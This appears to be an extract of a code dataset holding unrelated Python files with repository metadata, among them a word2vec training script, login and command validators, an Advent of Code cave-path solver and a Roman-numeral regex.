    # NOTE(review): y ticks are hard-coded up to 40000 -- counts above that
    # plot outside the labelled range.
    plt.yticks([0,10000,20000,30000,40000],['0','10000','20000','30000','40000'],fontsize=14)
    plt.xlabel('ee (%)',fontsize=16)
    plt.ylabel('Count',fontsize=16)
    plt.tick_params(bottom='on',left='on')
    plt.title(title,fontsize=16)
    plt.tight_layout()
    plt.show()
def DeltaLearningPrediction(base_x,rest_x,space_x,base_y,rest_y,base_model,specific_model,base_model_only_point_idx,
                            selidx2idxs_map,k_fold_num,random_seed=2022):
    """Predict the synthetic space with a base model plus per-group deltas.

    The base model is cross-validated to get a baseline error, then for each
    group of extra training points a "specific" model is fitted on the
    residuals (delta learning).  The correction is kept only when it lowers
    the cross-validated error for that group; otherwise the plain base
    prediction and baseline error are used.

    :param base_x: features used to train/validate the base model.
    :param rest_x: features of the additional points the delta models use.
    :param space_x: features of every point in the synthetic space.
    :param base_y: targets matching ``base_x``.
    :param rest_y: targets matching ``rest_x``.
    :param base_model: estimator with sklearn-style fit/predict.
    :param specific_model: estimator fitted on residuals per group.
    :param base_model_only_point_idx: space indices predicted by the base
        model alone.
    :param selidx2idxs_map: ``{tuple of rest indices: list of space indices}``.
    :param k_fold_num: number of cross-validation folds.
    :param random_seed: shuffle seed for KFold.
    :return: ``(index -> prediction, index -> error)`` dicts re-keyed in
        ascending integer order.
    """
    # --- Baseline: K-fold CV error of the base model on its training set.
    val_p = []
    val_Y = []
    kfold = KFold(n_splits=k_fold_num,shuffle=True,random_state=random_seed)
    for fit_idx,val_idx in kfold.split(base_x):
        fit_x,fit_y = base_x[fit_idx],base_y[fit_idx]
        val_x,val_y = base_x[val_idx],base_y[val_idx]
        base_model.fit(fit_x,fit_y)
        val_p.append(base_model.predict(val_x))
        val_Y.append(val_y)
    val_p = np.concatenate(val_p)
    val_y = np.concatenate(val_Y)
    base_error = std_error(val_y,val_p)
    # Prediction error for every point in the space, used as its confidence.
    point_error_map = {idx:base_error for idx in base_model_only_point_idx}
    # Refit the base model on all base data before predicting the space.
    base_model.fit(base_x,base_y)
    points_x = space_x[base_model_only_point_idx]
    points_p = base_model.predict(points_x)
    point_pred_map = {idx:points_p[i] for i,idx in enumerate(base_model_only_point_idx)} ## Check
    # --- Per-group delta models.
    for j,selidx in enumerate(selidx2idxs_map):
        idxs = selidx2idxs_map[selidx]
        sel_x = rest_x[list(selidx)]
        sel_y = rest_y[list(selidx)]
        val_p = []
        val_Y = []
        # Delta learning needs more samples than folds to cross-validate.
        if len(sel_x) > k_fold_num:
            # CV the base+delta combination on this group's residuals.
            for fit_idx,val_idx in kfold.split(sel_x):
                fit_x,fit_y = sel_x[fit_idx],sel_y[fit_idx]
                val_x,val_y = sel_x[val_idx],sel_y[val_idx]
                fit_p = base_model.predict(fit_x)
                fit_d = fit_y - fit_p
                specific_model.fit(fit_x,fit_d)
                val_p.append(base_model.predict(val_x)+specific_model.predict(val_x))
                val_Y.append(val_y)
            val_p = np.concatenate(val_p)
            val_y = np.concatenate(val_Y)
            error = std_error(val_y,val_p)
            if error > base_error:
                # Delta model is worse: fall back to the base prediction.
                for idx in idxs:
                    point_error_map[idx] = base_error
                points_x = space_x[idxs]
                points_p = base_model.predict(points_x)
                for i,idx in enumerate(idxs):
                    point_pred_map[idx] = points_p[i]
            else:
                # Delta model helps: refit it on the whole group and apply
                # base + delta to the group's space points.
                for idx in idxs:
                    point_error_map[idx] = error
                sel_p = base_model.predict(sel_x)
                sel_d = sel_y - sel_p
                specific_model.fit(sel_x,sel_d)
                points_x = space_x[idxs]
                points_p = base_model.predict(points_x) + specific_model.predict(points_x)
                for i,idx in enumerate(idxs):
                    point_pred_map[idx] = points_p[i]
        else:
            # Too few samples for CV: use the base model alone.
            points_x = space_x[idxs]
            points_p = base_model.predict(points_x)
            for i,idx in enumerate(idxs):
                point_pred_map[idx] = points_p[i]
                point_error_map[idx] = base_error
    # Re-key both maps in ascending order.  NOTE(review): this assumes the
    # point indices are exactly the integers 0..N-1 -- confirm at call sites.
    sorted_point_error_map = {}
    for i in range(len(point_error_map)):
        sorted_point_error_map[i] = point_error_map[i]
    sorted_point_pred_map = {}
    for i in range(len(point_pred_map)):
        sorted_point_pred_map[i] = point_pred_map[i]
    return sorted_point_pred_map,sorted_point_error_map
| 6,434 | 0 | 124 |
c8521555850f9bc486cf9f8cc0ba3ef9390b66ee | 875 | py | Python | my_lambdata/postISA.py | SaraWestWA/lambdata-iambrookedrake | a599cec77cdeb37b3465adc6d0d3e5e92b050ad6 | [
"MIT"
] | null | null | null | my_lambdata/postISA.py | SaraWestWA/lambdata-iambrookedrake | a599cec77cdeb37b3465adc6d0d3e5e92b050ad6 | [
"MIT"
] | 1 | 2021-08-23T20:57:33.000Z | 2021-08-23T20:57:33.000Z | my_lambdata/postISA.py | SaraWestWA/lambdata-iambrookedrake | a599cec77cdeb37b3465adc6d0d3e5e92b050ad6 | [
"MIT"
] | 2 | 2020-07-13T01:26:47.000Z | 2020-09-15T03:29:08.000Z | import pandas as pd
# Accepts input for 'Salary Offer' and 'Tax Rate %' to provide
# Annual, Monthly, and Weekly take home pay after taxes and
# Lambda ISA deductions
if __name__ == '__main__':
    # Interactive driver: prompt for the offer and tax rate, then report
    # annual / monthly / weekly take-home pay.
    # NOTE(review): ``TakeHomePay`` is not defined in this copy of the
    # module -- confirm the class exists in the full file before running.
    salary = int(input("Salary Offer $:"))
    taxrate = int(input('Tax Rate as Whole Number ___%:'))
    take_home = TakeHomePay(salary, taxrate).postISA(salary, taxrate)
    print("After ISA and Taxes, Take Home Pay is:", round(take_home, 2),
          "Annually/// ", round(take_home/12, 2), "Monthly///",
          round(take_home/52, 2), "Weekly")
| 35 | 72 | 0.637714 | import pandas as pd
class TakeHomePay():
    """Compute take-home pay after taxes and the Lambda ISA deduction.

    Stores a salary offer and a whole-number tax rate; ``postISA`` returns
    the annual pay net of taxes and the fixed ISA percentage.
    """

    def __init__(self, salary, taxrate):
        self.salary = salary
        self.taxrate = taxrate

    def postISA(self, salary, taxrate):
        # NOTE: the parameters are ignored; the values stored on the
        # instance are used instead (matches the original behavior).
        ISArate = 17  # ISA deduction as a whole-number percent
        tax_keep = 1 - self.taxrate / 100
        isa_keep = 1 - ISArate / 100
        return self.salary * tax_keep * isa_keep
if __name__ == '__main__':
    # Interactive driver: prompt for the offer and tax rate, then report
    # annual / monthly / weekly take-home pay.
    salary = int(input("Salary Offer $:"))
    taxrate = int(input('Tax Rate as Whole Number ___%:'))
    # postISA ignores its arguments and uses the values stored on the
    # instance, so passing them again here is redundant but harmless.
    take_home = TakeHomePay(salary, taxrate).postISA(salary, taxrate)
    print("After ISA and Taxes, Take Home Pay is:", round(take_home, 2),
          "Annually/// ", round(take_home/12, 2), "Monthly///",
          round(take_home/52, 2), "Weekly")
| 238 | -1 | 77 |
22be887cd1f296eff9257ff04bb6e26cac5510dd | 5,976 | py | Python | Job Portal with Automated Resume Screening/gensim-4.1.2/gensim/scripts/word2vec_standalone.py | Candida18/Job-Portal-with-Automated-Resume-Screening | 19d19464ad3d1714da856656753a4afdfe257b31 | [
"MIT"
] | 3 | 2021-03-29T19:21:08.000Z | 2021-12-31T09:30:11.000Z | Job Portal with Automated Resume Screening/gensim-4.1.2/gensim/scripts/word2vec_standalone.py | Candida18/Job-Portal-with-Automated-Resume-Screening | 19d19464ad3d1714da856656753a4afdfe257b31 | [
"MIT"
] | 1 | 2021-08-30T08:53:09.000Z | 2021-08-30T08:53:09.000Z | venv/Lib/site-packages/gensim/scripts/word2vec_standalone.py | saritmaitra/nlp_ner_topic_modeling | 70914b4ae4cd7d3b9cb10776161132216394883c | [
"MIT"
] | 2 | 2022-01-15T05:36:58.000Z | 2022-02-08T15:25:50.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s -train CORPUS -output VECTORS -size SIZE -window WINDOW
-cbow CBOW -sample SAMPLE -hs HS -negative NEGATIVE -threads THREADS -iter ITER
-min_count MIN-COUNT -alpha ALPHA -binary BINARY -accuracy FILE
Trains a neural embedding model on text file CORPUS.
Parameters essentially reproduce those used by the original C tool
(see https://code.google.com/archive/p/word2vec/).
Parameters for training:
-train <file>
Use text data from <file> to train the model
-output <file>
Use <file> to save the resulting word vectors / word clusters
-size <int>
Set size of word vectors; default is 100
-window <int>
Set max skip length between words; default is 5
-sample <float>
Set threshold for occurrence of words. Those that appear with higher frequency in the training data
will be randomly down-sampled; default is 1e-3, useful range is (0, 1e-5)
-hs <int>
Use Hierarchical Softmax; default is 0 (not used)
-negative <int>
Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)
-threads <int>
Use <int> threads (default 3)
-iter <int>
Run more training iterations (default 5)
-min_count <int>
This will discard words that appear less than <int> times; default is 5
-alpha <float>
Set the starting learning rate; default is 0.025 for skip-gram and 0.05 for CBOW
-binary <int>
Save the resulting vectors in binary moded; default is 0 (off)
-cbow <int>
Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)
-accuracy <file>
Compute accuracy of the resulting model analogical inference power on questions file <file>
See an example of questions file
at https://code.google.com/p/word2vec/source/browse/trunk/questions-words.txt
Example: python -m gensim.scripts.word2vec_standalone -train data.txt \
-output vec.txt -size 200 -sample 1e-4 -binary 0 -iter 3
"""
import logging
import os.path
import sys
import argparse
from numpy import seterr
from gensim.models.word2vec import Word2Vec, LineSentence # avoid referencing __main__ in pickle
# Module-level logger; the __main__ guard below configures logging itself.
logger = logging.getLogger(__name__)

if __name__ == "__main__":
    logging.basicConfig(format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s', level=logging.INFO)
    logger.info("running %s", " ".join(sys.argv))
    seterr(all='raise')  # don't ignore numpy errors

    # Command-line interface mirroring the original C word2vec tool; see the
    # module docstring for parameter semantics.
    parser = argparse.ArgumentParser()
    parser.add_argument("-train", help="Use text data from file TRAIN to train the model", required=True)
    parser.add_argument("-output", help="Use file OUTPUT to save the resulting word vectors")
    parser.add_argument("-window", help="Set max skip length WINDOW between words; default is 5", type=int, default=5)
    parser.add_argument("-size", help="Set size of word vectors; default is 100", type=int, default=100)
    parser.add_argument(
        "-sample",
        help="Set threshold for occurrence of words. "
             "Those that appear with higher frequency in the training data will be randomly down-sampled; "
             "default is 1e-3, useful range is (0, 1e-5)",
        type=float, default=1e-3)
    parser.add_argument(
        "-hs", help="Use Hierarchical Softmax; default is 0 (not used)",
        type=int, default=0, choices=[0, 1]
    )
    parser.add_argument(
        "-negative", help="Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)",
        type=int, default=5
    )
    parser.add_argument("-threads", help="Use THREADS threads (default 3)", type=int, default=3)
    parser.add_argument("-iter", help="Run more training iterations (default 5)", type=int, default=5)
    parser.add_argument(
        "-min_count", help="This will discard words that appear less than MIN_COUNT times; default is 5",
        type=int, default=5
    )
    parser.add_argument(
        "-alpha", help="Set the starting learning rate; default is 0.025 for skip-gram and 0.05 for CBOW",
        type=float
    )
    parser.add_argument(
        "-cbow", help="Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)",
        type=int, default=1, choices=[0, 1]
    )
    parser.add_argument(
        "-binary", help="Save the resulting vectors in binary mode; default is 0 (off)",
        type=int, default=0, choices=[0, 1]
    )
    parser.add_argument("-accuracy", help="Use questions from file ACCURACY to evaluate the model")

    args = parser.parse_args()

    # Skip-gram and CBOW use different default learning rates.
    if args.cbow == 0:
        skipgram = 1
        if not args.alpha:
            args.alpha = 0.025
    else:
        skipgram = 0
        if not args.alpha:
            args.alpha = 0.05

    # Stream sentences from disk instead of loading the corpus into memory.
    corpus = LineSentence(args.train)

    model = Word2Vec(
        corpus, vector_size=args.size, min_count=args.min_count, workers=args.threads,
        window=args.window, sample=args.sample, alpha=args.alpha, sg=skipgram,
        hs=args.hs, negative=args.negative, cbow_mean=1, epochs=args.iter,
    )

    # With -output, save the vectors only; otherwise save the full model
    # next to the training file plus a vectors file in the requested format.
    if args.output:
        outfile = args.output
        model.wv.save_word2vec_format(outfile, binary=args.binary)
    else:
        outfile = args.train.split('.')[0]
        model.save(outfile + '.model')
        if args.binary == 1:
            model.wv.save_word2vec_format(outfile + '.model.bin', binary=True)
        else:
            model.wv.save_word2vec_format(outfile + '.model.txt', binary=False)

    if args.accuracy:
        questions_file = args.accuracy
        # NOTE(review): ``Word2Vec.accuracy`` was removed in gensim 4.x,
        # while the rest of this script already uses the 4.x API
        # (``vector_size``/``epochs``); this line likely needs
        # ``model.wv.evaluate_word_analogies(questions_file)`` -- confirm.
        model.accuracy(questions_file)

    logger.info("finished running %s", os.path.basename(sys.argv[0]))
| 41.5 | 118 | 0.643574 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU LGPL v2.1 - http://www.gnu.org/licenses/lgpl.html
"""
USAGE: %(program)s -train CORPUS -output VECTORS -size SIZE -window WINDOW
-cbow CBOW -sample SAMPLE -hs HS -negative NEGATIVE -threads THREADS -iter ITER
-min_count MIN-COUNT -alpha ALPHA -binary BINARY -accuracy FILE
Trains a neural embedding model on text file CORPUS.
Parameters essentially reproduce those used by the original C tool
(see https://code.google.com/archive/p/word2vec/).
Parameters for training:
-train <file>
Use text data from <file> to train the model
-output <file>
Use <file> to save the resulting word vectors / word clusters
-size <int>
Set size of word vectors; default is 100
-window <int>
Set max skip length between words; default is 5
-sample <float>
Set threshold for occurrence of words. Those that appear with higher frequency in the training data
will be randomly down-sampled; default is 1e-3, useful range is (0, 1e-5)
-hs <int>
Use Hierarchical Softmax; default is 0 (not used)
-negative <int>
Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)
-threads <int>
Use <int> threads (default 3)
-iter <int>
Run more training iterations (default 5)
-min_count <int>
This will discard words that appear less than <int> times; default is 5
-alpha <float>
Set the starting learning rate; default is 0.025 for skip-gram and 0.05 for CBOW
-binary <int>
Save the resulting vectors in binary moded; default is 0 (off)
-cbow <int>
Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)
-accuracy <file>
Compute accuracy of the resulting model analogical inference power on questions file <file>
See an example of questions file
at https://code.google.com/p/word2vec/source/browse/trunk/questions-words.txt
Example: python -m gensim.scripts.word2vec_standalone -train data.txt \
-output vec.txt -size 200 -sample 1e-4 -binary 0 -iter 3
"""
import logging
import os.path
import sys
import argparse
from numpy import seterr
from gensim.models.word2vec import Word2Vec, LineSentence # avoid referencing __main__ in pickle
# Module-level logger; the __main__ guard below configures logging itself.
logger = logging.getLogger(__name__)

if __name__ == "__main__":
    # Command-line interface mirroring the original C word2vec tool; see the
    # module docstring for parameter semantics.
    logging.basicConfig(format='%(asctime)s : %(threadName)s : %(levelname)s : %(message)s', level=logging.INFO)
    logger.info("running %s", " ".join(sys.argv))
    seterr(all='raise')  # don't ignore numpy errors

    parser = argparse.ArgumentParser()
    parser.add_argument("-train", help="Use text data from file TRAIN to train the model", required=True)
    parser.add_argument("-output", help="Use file OUTPUT to save the resulting word vectors")
    parser.add_argument("-window", help="Set max skip length WINDOW between words; default is 5", type=int, default=5)
    parser.add_argument("-size", help="Set size of word vectors; default is 100", type=int, default=100)
    parser.add_argument(
        "-sample",
        help="Set threshold for occurrence of words. "
             "Those that appear with higher frequency in the training data will be randomly down-sampled; "
             "default is 1e-3, useful range is (0, 1e-5)",
        type=float, default=1e-3)
    parser.add_argument(
        "-hs", help="Use Hierarchical Softmax; default is 0 (not used)",
        type=int, default=0, choices=[0, 1]
    )
    parser.add_argument(
        "-negative", help="Number of negative examples; default is 5, common values are 3 - 10 (0 = not used)",
        type=int, default=5
    )
    parser.add_argument("-threads", help="Use THREADS threads (default 3)", type=int, default=3)
    parser.add_argument("-iter", help="Run more training iterations (default 5)", type=int, default=5)
    parser.add_argument(
        "-min_count", help="This will discard words that appear less than MIN_COUNT times; default is 5",
        type=int, default=5
    )
    parser.add_argument(
        "-alpha", help="Set the starting learning rate; default is 0.025 for skip-gram and 0.05 for CBOW",
        type=float
    )
    parser.add_argument(
        "-cbow", help="Use the continuous bag of words model; default is 1 (use 0 for skip-gram model)",
        type=int, default=1, choices=[0, 1]
    )
    parser.add_argument(
        "-binary", help="Save the resulting vectors in binary mode; default is 0 (off)",
        type=int, default=0, choices=[0, 1]
    )
    parser.add_argument("-accuracy", help="Use questions from file ACCURACY to evaluate the model")

    args = parser.parse_args()

    # Skip-gram and CBOW use different default learning rates.
    if args.cbow == 0:
        skipgram = 1
        if not args.alpha:
            args.alpha = 0.025
    else:
        skipgram = 0
        if not args.alpha:
            args.alpha = 0.05

    # Stream sentences from disk instead of loading the corpus into memory.
    corpus = LineSentence(args.train)

    model = Word2Vec(
        corpus, vector_size=args.size, min_count=args.min_count, workers=args.threads,
        window=args.window, sample=args.sample, alpha=args.alpha, sg=skipgram,
        hs=args.hs, negative=args.negative, cbow_mean=1, epochs=args.iter,
    )

    # With -output, save the vectors only; otherwise save the full model
    # next to the training file plus a vectors file in the requested format.
    if args.output:
        outfile = args.output
        model.wv.save_word2vec_format(outfile, binary=args.binary)
    else:
        outfile = args.train.split('.')[0]
        model.save(outfile + '.model')
        if args.binary == 1:
            model.wv.save_word2vec_format(outfile + '.model.bin', binary=True)
        else:
            model.wv.save_word2vec_format(outfile + '.model.txt', binary=False)

    if args.accuracy:
        questions_file = args.accuracy
        # Fix: ``Word2Vec.accuracy`` no longer exists in gensim 4.x (the
        # script already uses the 4.x API, e.g. vector_size/epochs); the
        # analogy evaluation now lives on the KeyedVectors object.
        model.wv.evaluate_word_analogies(questions_file)

    logger.info("finished running %s", os.path.basename(sys.argv[0]))
| 0 | 0 | 0 |
fc3ad5daaf48fb4119014f23e24f8ab5e227292c | 2,951 | py | Python | 352/mini-projects/hw3/CENG352_Mini_Project_3_Files/source/validators.py | ysyesilyurt/Metu-CENG | a83fcab00f68e28bda307bb94c060f55042a1389 | [
"MIT"
] | 33 | 2019-03-19T07:51:17.000Z | 2022-03-15T11:04:35.000Z | 352/mini-projects/hw3/CENG352_Mini_Project_3_Files/source/validators.py | ysyesilyurt/Metu-CENG | a83fcab00f68e28bda307bb94c060f55042a1389 | [
"MIT"
] | 1 | 2019-11-09T18:08:21.000Z | 2019-11-09T18:08:21.000Z | 352/mini-projects/hw3/CENG352_Mini_Project_3_Files/source/validators.py | ysyesilyurt/Metu-CENG | a83fcab00f68e28bda307bb94c060f55042a1389 | [
"MIT"
] | 13 | 2019-11-08T06:18:21.000Z | 2022-01-07T17:17:38.000Z | import messages
"""
This is a basic validator that returns (True, None) when a user is
authenticated and the number of command tokens is 1.
Returns (False, <message>) otherwise.
"""
| 29.808081 | 76 | 0.689258 | import messages
def sign_up_validator(auth_customer, cmd_tokens):
    """Validate ``sign_up <email> <password> <first> <last> <plan_id>``."""
    # A signed-in user may not create another account.
    if auth_customer:
        return False, messages.USER_ALREADY_SIGNED_IN
    # Command word plus exactly five arguments.
    if len(cmd_tokens) == 6:
        return True, None
    return False, messages.CMD_NOT_ENOUGH_ARGS % 5
def sign_in_validator(auth_customer, cmd_tokens):
    """Validate a ``sign_in <email> <password>`` command.

    Returns ``(True, None)`` on success, otherwise ``(False, <message>)``.

    Fixes: the already-signed-in branches returned ``None`` instead of
    ``False`` as the flag (inconsistent with every other validator in this
    module), and indexing ``cmd_tokens[1]`` raised IndexError on a bare
    ``sign_in`` typed by a signed-in user.
    """
    # Disregard already signed in users.
    if auth_customer:
        if len(cmd_tokens) > 1 and auth_customer.email == cmd_tokens[1]:
            return False, messages.USER_ALREADY_SIGNED_IN
        return False, messages.USER_OTHER_SIGNED_IN
    # sign_in <email> <password>
    if len(cmd_tokens) == 3:
        return True, None
    return False, messages.CMD_NOT_ENOUGH_ARGS % 2
"""
This is a basic validator: it returns (True, None) whenever the user is
authenticated. Otherwise it returns (False, <message>) -- the
not-authorized message when exactly one command token was given, and the
invalid-arguments message otherwise.
"""
def basic_validator(auth_customer, cmd_tokens):
    """Accept any signed-in user; reject everyone else with a reason."""
    if auth_customer:
        return True, None
    # Not signed in: a bare command gets the auth error; extra tokens are
    # treated as malformed input.
    if len(cmd_tokens) == 1:
        return False, messages.USER_NOT_AUTHORIZED
    return False, messages.CMD_INVALID_ARGS
def sign_out_validator(auth_customer, cmd_tokens):
    """Signing out only requires being signed in; delegate to basic_validator."""
    return basic_validator(auth_customer, cmd_tokens)
def quit_validator(cmd_tokens):
    """A ``quit`` command takes no arguments."""
    if len(cmd_tokens) != 1:
        return False, messages.CMD_INVALID_ARGS
    return True, None
def show_plans_validator(auth_customer, cmd_tokens):
    """Viewing plans only requires being signed in; delegate to basic_validator."""
    return basic_validator(auth_customer, cmd_tokens)
def show_subscription_validator(auth_customer, cmd_tokens):
    """Viewing one's subscription only requires being signed in; delegate."""
    return basic_validator(auth_customer, cmd_tokens)
def watched_movies_validator(auth_customer, cmd_tokens):
    """Require a signed-in user plus at least one movie argument."""
    if not auth_customer:
        return False, messages.USER_NOT_AUTHORIZED
    if len(cmd_tokens) > 1:
        return True, None
    return False, messages.CMD_NOT_ENOUGH_ARGS_AT_LEAST % 1
def subscribe_validator(auth_customer, cmd_tokens):
    """Validate a ``subscribe <plan_id>`` command from a signed-in user."""
    if not auth_customer:
        return False, messages.USER_NOT_AUTHORIZED
    # Command word plus exactly one plan id.
    if len(cmd_tokens) == 2:
        return True, None
    return False, messages.CMD_NOT_ENOUGH_ARGS % 1
def search_for_movies_validator(auth_customer, cmd_tokens):
    """Validate a keyword search issued by a signed-in user."""
    if not auth_customer:
        return False, messages.USER_NOT_AUTHORIZED
    # search_for_movies <keyword_1> ... <keyword_n>: at least one keyword.
    if len(cmd_tokens) > 1:
        return True, None
    return False, messages.CMD_NOT_ENOUGH_ARGS_AT_LEAST % 1
def suggest_movies_validator(auth_customer, cmd_tokens):
    """Suggestions only require being signed in; delegate to basic_validator."""
    return basic_validator(auth_customer, cmd_tokens)
| 2,441 | 0 | 275 |
f72ac585b2ba49e680b69313a2fa0d0a5d6a749c | 137 | py | Python | Python/Regex and Parsing/Validating Roman Numerals/Solution.py | PawarAditi/HackerRank | fcd9d1450ee293372ce5f1d4a3b7284ecf472657 | [
"MIT"
] | 219 | 2018-06-17T19:47:22.000Z | 2022-03-27T15:28:56.000Z | Python/Regex and Parsing/Validating Roman Numerals/Solution.py | PawarAditi/HackerRank | fcd9d1450ee293372ce5f1d4a3b7284ecf472657 | [
"MIT"
] | 2 | 2020-08-12T16:47:41.000Z | 2020-12-15T17:05:57.000Z | Python/Regex and Parsing/Validating Roman Numerals/Solution.py | PawarAditi/HackerRank | fcd9d1450ee293372ce5f1d4a3b7284ecf472657 | [
"MIT"
] | 182 | 2018-12-12T21:36:50.000Z | 2022-03-26T17:49:51.000Z | import re
# Roman numerals 1-3999: thousands M{0,3}; hundreds CM|CD|D?C{0,3};
# tens XC|XL|L?X{0,3}; units IX|IV|V?I{0,3}. Only the end is anchored
# because re.match already anchors the start; note the empty string also
# matches, since every group is optional.
regex_pattern = r'M{0,3}(C[MD]|D?C{0,3})(X[CL]|L?X{0,3})(I[VX]|V?I{0,3})$'
print(str(bool(re.match(regex_pattern, input())))) | 27.4 | 74 | 0.605839 | import re
# Roman numerals 1-3999: thousands M{0,3}; hundreds CM|CD|D?C{0,3};
# tens XC|XL|L?X{0,3}; units IX|IV|V?I{0,3}. Only the end is anchored
# because re.match already anchors the start; note the empty string also
# matches, since every group is optional.
regex_pattern = r'M{0,3}(C[MD]|D?C{0,3})(X[CL]|L?X{0,3})(I[VX]|V?I{0,3})$'
print(str(bool(re.match(regex_pattern, input())))) | 0 | 0 | 0 |
8791a7ba3ffc3a49544214256a6f8aed850b1945 | 4,232 | py | Python | Day12/12_passage_pathing.py | schca675/my-code-for-advent-of-code-2021 | e8bdb986930b444884d37e679a37ed25efe2b34e | [
"Apache-2.0"
] | null | null | null | Day12/12_passage_pathing.py | schca675/my-code-for-advent-of-code-2021 | e8bdb986930b444884d37e679a37ed25efe2b34e | [
"Apache-2.0"
] | null | null | null | Day12/12_passage_pathing.py | schca675/my-code-for-advent-of-code-2021 | e8bdb986930b444884d37e679a37ed25efe2b34e | [
"Apache-2.0"
] | null | null | null | # --- Day 12: Passage Pathing ---
import copy
# Run the sample input first, then the real puzzle input.
# NOTE(review): ``resolve_puzzle`` is not defined in this extract of the
# module -- confirm it exists in the full file before running.
print("TEST")
resolve_puzzle("test_data.txt")
print("PUZZLE")
resolve_puzzle("data.txt") ## takes a while (<1min) --> not very efficient | 41.490196 | 133 | 0.624764 | # --- Day 12: Passage Pathing ---
import copy
class Path:
    """One partial walk through the cave system (Advent of Code day 12, part 2).

    Tracks how often each lower-case (small) cave has been entered and whether
    any small cave has already been entered twice.
    """
    def __init__(self, cave, steps_taken, next_step, has_visited_lower_caves, lower_case_visited_twice):
        self.lower_cave_visited_twice = lower_case_visited_twice
        self.has_visited_lower_caves = has_visited_lower_caves
        if len(has_visited_lower_caves) == 0:
            # Fresh path: start every counter at zero (upper-case caves
            # simply never get incremented and stay at 0).
            self.lower_cave_visited_twice = False
            for cave_name in cave.nodes:
                self.has_visited_lower_caves[cave_name] = 0
        if next_step == next_step.lower():
            # Entering a small cave: bump its visit counter.
            new_count = self.has_visited_lower_caves[next_step] + 1
            self.has_visited_lower_caves[next_step] = new_count
            if new_count == 2:
                self.lower_cave_visited_twice = True
        self.steps_taken = steps_taken
        self.steps_taken.append(next_step)
    def can_steps_be_taken(self, next_step):
        """Return whether *next_step* may legally extend this path."""
        if next_step != next_step.lower():
            # Big (upper-case) caves can be revisited freely.
            return True
        if next_step == "start":
            # The start cave is never re-entered.
            return False
        # One small cave may be visited twice; once that budget is spent,
        # only unvisited small caves remain legal.
        allowed_visits = 0 if self.lower_cave_visited_twice else 1
        return self.has_visited_lower_caves[next_step] <= allowed_visits
class Path_part1:
    """Part-1 variant of Path: each small cave may be entered at most once,
    so a simple visited-flag per cave is enough (no counters)."""
    def __init__(self, cave, steps_taken, next_step, has_visited_lower_caves):
        self.has_visited_lower_caves = has_visited_lower_caves
        if len(has_visited_lower_caves) == 0:
            # Fresh path: mark every cave unvisited (upper-case caves
            # simply never get flipped and stay False).
            for cave_name in cave.nodes:
                self.has_visited_lower_caves[cave_name] = False
        # Entering a small cave marks it as visited.
        if next_step == next_step.lower():
            self.has_visited_lower_caves[next_step] = True
        self.steps_taken = steps_taken
        self.steps_taken.append(next_step)
class Cave:
    """Undirected cave graph: `nodes` are cave names, `edges` connect them."""
    def __init__(self, nodes, edges):
        self.nodes = nodes
        self.edges = edges # tuples (a, b) connections
        self.neighbours = dict() # node --> neighbours
        # Build the adjacency map; each edge is registered in both directions.
        for edge in self.edges:
            conn_a = self.neighbours.get(edge[0], set())
            conn_a.add(edge[1])
            conn_b = self.neighbours.get(edge[1], set())
            conn_b.add(edge[0])
            self.neighbours[edge[0]] = conn_a
            self.neighbours[edge[1]] = conn_b
    def get_all_paths(self, paths_so_far):
        """Recursively extend every partial path in `paths_so_far` and return
        the list of all complete paths (those ending at 'end').

        Each legal extension deep-copies the path state, so sibling branches
        never share visit counters. Exponential in the number of paths by
        design (exhaustive enumeration).
        """
        all_paths = []
        for path in paths_so_far:
            updated_paths = []
            # if path has reached end --> skip
            if path.steps_taken[-1] == 'end':
                # end is reached, so we attach it to all paths without next steps
                all_paths.append(path)
                continue
            # Else: Check next steps and add those to final list
            for poss_steps in self.neighbours[path.steps_taken[-1]]:
                # if not path.has_visited_lower_caves[poss_steps]: ## for part 1
                if path.can_steps_be_taken(poss_steps):
                    # new_path = Path(self, copy.deepcopy(path.steps_taken), poss_steps, copy.deepcopy(path.has_visited_lower_caves))
                    new_path = Path(self, copy.deepcopy(path.steps_taken), poss_steps,
                                    copy.deepcopy(path.has_visited_lower_caves), copy.deepcopy(path.lower_cave_visited_twice))
                    updated_paths.append(new_path)
            all_paths.extend(self.get_all_paths(updated_paths))
        return all_paths
def get_puzzle_input(filepath):
    """Parse 'a-b' edge lines from *filepath* and return the resulting Cave."""
    nodes = set()
    edges = set()
    with open(filepath) as handle:
        for raw_line in handle:
            left, right = raw_line.rstrip().split('-')
            nodes.update((left, right))
            edges.add((left, right))
    return Cave(nodes, edges)
def resolve_puzzle(filepath):
    """Count every distinct path through the cave in *filepath* and print it."""
    cave = get_puzzle_input(filepath)
    initial_path = Path(cave, [], 'start', dict(), False)
    found_paths = cave.get_all_paths([initial_path])
    print("PUZZLE SOLUTION: {} unique paths".format(len(found_paths)))
print("TEST")
resolve_puzzle("test_data.txt")
print("PUZZLE")
resolve_puzzle("data.txt") ## takes a while (<1min) --> not very efficient | 3,819 | -24 | 247 |
5e0f6f4ca343035446ce4d5b7cee2f2840ba7722 | 2,627 | py | Python | optimization_tutorial/optimizers/parameters_dicts.py | gniqeh/optimization-tutorial | f72f7c08a3e857ed36c4b3973f0164862680a3de | [
"MIT"
] | null | null | null | optimization_tutorial/optimizers/parameters_dicts.py | gniqeh/optimization-tutorial | f72f7c08a3e857ed36c4b3973f0164862680a3de | [
"MIT"
] | null | null | null | optimization_tutorial/optimizers/parameters_dicts.py | gniqeh/optimization-tutorial | f72f7c08a3e857ed36c4b3973f0164862680a3de | [
"MIT"
] | null | null | null | epsilon_d_ = {
"epsilon": ["float", "0.03", "0.01 ... 0.3"],
}
distribution_d_ = {
"distribution": ["string", "normal", "normal, laplace, logistic, gumbel"],
}
n_neighbours_d_ = {
"n_neighbours": ["int", "3", "1 ... 10"],
}
p_accept_d_ = {
"p_accept": ["float", "0.1", "0.01 ... 0.3"],
}
repulsion_factor_d = {
"repulsion_factor": ["float", "5", "2 ... 10"],
}
annealing_rate_d = {
"annealing_rate": ["float", "0.97", "0.9 ... 0.99"],
}
start_temp_d = {
